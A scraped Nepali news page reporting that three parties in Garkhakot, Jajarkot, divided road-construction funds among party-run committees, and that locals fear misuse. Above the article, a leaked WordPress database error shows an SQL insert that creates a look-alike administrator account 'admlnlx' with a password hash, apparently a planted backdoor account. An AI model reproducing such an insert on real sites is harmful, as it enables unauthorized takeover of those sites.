WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvkyhleVnfMwdmVY2Q2aPPM8JulEZq1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 16:42:49', '', 'admlnlx', 'admlnlx')
जाजरकोट,माघ ३-
किलोमिटर सडक निर्माण गर्न गर्खाकोटका तीन दलले आफ्नो भागबण्डा गरेका छन् ।
जिल्ला विकास समिति, गाविस र सांसद विकासको रकमलाई भागबण्डा गरी उपभोक्ता समिति निर्माण गरी सडक निर्माणमा तीन दल जुटेका हुन् । गर्खाकोट गाविस–१ बाट २ सम्म गर्खाकोट गाविसको रु २० लाख २२ हजारमा सडक निर्माणको जिम्मा नेकपा (एमाले)ले जिम्मा लिएको छ ।
एमालेले प्रमेश्वर शाहलाई उपभोक्ता समितिको अध्यक्ष बनाएको छ । ३ र ४ वडासम्म संयुक्तरुपमा नेपाली काँग्रेसले अध्यक्ष र माओवादी केन्द्रले सचिव भएर काम सुरु गर्न थालेका छन् । यो सडक निर्माणका लागि सांसद विकासको रु १७ लाख र जिविसको रु १८ लाखको भाग काँग्रेस र माओवादी केन्द्रको भागबण्डामा परेको छ ।
दलीय भागबण्डा गरेर सडक निर्माणमा जुटेको देख्दा स्थानीयवासीले बाटो निर्माणभन्दा पनि रकम बाँडेर खाने दाउमा दल लागेको गुनासो गरेका छन् ।दलहरु मिलेर बजेट सक्न आ–आफ्नै समिति गठन गरी तैचुप, मैचुप गरेर अगाडि बढेपछि बजेटअनुसारको सडक निर्माण कार्य पूरा नहुने हो कि भनेर स्थानीयवासी चिन्तामा परेका छन् ।- रासस